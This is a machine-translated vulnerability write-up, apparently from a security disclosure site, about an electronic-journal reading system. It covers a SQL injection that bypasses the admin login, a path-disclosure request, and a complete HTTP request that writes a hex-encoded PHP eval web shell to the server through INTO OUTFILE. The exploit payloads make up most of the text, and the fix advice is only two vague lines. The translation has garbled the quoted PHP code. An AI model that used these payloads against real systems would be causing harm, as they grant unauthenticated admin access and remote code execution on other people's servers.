Popular electronic journals online reading system PHP and ASP latest versions kill SQL Injection & amp; PHP version getshell (No Logon required)

Popular electronic journals online reading system PHP and ASP latest versions kill SQL Injection & amp; PHP version getshell (No Logon required)

Latest versions of PHP and ASP for online Reading System of Electronic Journals
1. Kill SQL Injection
2. PHP getshell (No Logon required)
3. Website brute-force attack path

 

1. SQL injection. PHP and ASP are both effective!

PHP version:

Background login code. The problem lies in the verification function:

Global. fun. php


 

// Log on to function function_login () {session_start (); function_safety (); $ username = function_cleanstr ($ _ POST ['username']); $ password = md5 ($ _ POST ['Password']); $ code = md5 (strtoupper ($ _ POST ['code']); if ($ username = ''or $ password ='') {function_alert ('user name and password cannot be blank! ', 'Index. php');} if ($ code! = $ _ SESSION ['code']) {function_alert ('verification code error! ', 'Index. php');} if (! _ Query ("SELECT * FROM magacms_user WHERE username = '$ username' AND password =' $ password' LIMIT 1") {function_alert ('user name AND password are incorrect! ', 'Index. php ');} $ intime = date ('Y-m-d H: I: s', time (); $ inip = function_getRealIp (); // setcookie ('username', md5 ($ username); // use cookies to remember the logon Status $ _ SESSION ['username'] = $ username; // use session to remember the logon status _ update ("UPDATE magacms_user SET intime = '$ intime', inip =' $ inip' WHERE username = '$ username '"); function_alert ('', 'admin _ main. php ');}

 

$ Username = function_cleanstr ($ _ POST ['username']); is used to obtain this parameter, the tracking function function_cleanst only performs html encoding on the parameters, as shown below:

// String Formatting function function_cleanstr ($ str) {$ newstr = htmlspecialchars (trim ($ str); // Delete spaces on both sides and transcode html return $ newstr ;}

Htmlspecialchars only filters HTML Tag characters such as <>. Therefore, the username field is injected and directly substituted

SELECT * FROM magacms_user WHERE username = '$ username' AND password =' $ password' LIMIT 1

SQL query.

Therefore, for any system, you only need to know the user name to log on to the system...
 

Login successful...
 

Executed SQL:

241 QuerySELECT * FROM magacms_user WHERE username='admin' OR 'A'='A' AND password='0cc175b9c0f1b6a831c399e269772661' LIMIT 1

 

ASP version:

Code analysis is similar to PHP

Logon submission: admin 'or 'A' = 'a
 

Login successful
 

2. Website brute-force attack path

Directly submit:/admin/shortdes/upload. inc. php? Action = upfile


 

The burst path is:

E: \ phpStudy \ WWW \ wwzzs \ admin \ shortdes \ upload. inc. php

3. PHP getshell

POST submission

POST /wwzzs/admin/?action=login HTTP/1.1Host: localhost:808User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://202.113.76.211:808/wwzzs/admin/Cookie: PHPSESSID=923954107451195a03f88567d6fa0accConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 183username=admin' and 1=2 UNION SELECT 0x3C3F70687020406576616C28245F504F53545B2741275D293B3F3E,2,3,4,5 into outfile 'E:/phpStudy/WWW/wwzzs/upload/bannerpic/t.php'#&password=a&code=A56M

Access:

Http: // localhost: 808/wwzzs/upload/bannerpic/t. php

Connection kitchen knife:
 

Executed SQL:
 

249 QuerySELECT * FROM magacms_user WHERE username='admin' and 1=2 UNION SELECT 0x3C3F70687020406576616C28245F504F53545B2741275D293B3F3E,2,3,4,5 into outfile 'E:/phpStudy/WWW/wwzzs/upload/bannerpic/t.php'#' AND password='0cc175b9c0f1b6a831c399e269772661' LIMIT 1

Execution completed.
 

 

  Solution:

Background login filter...

File Access restrictions...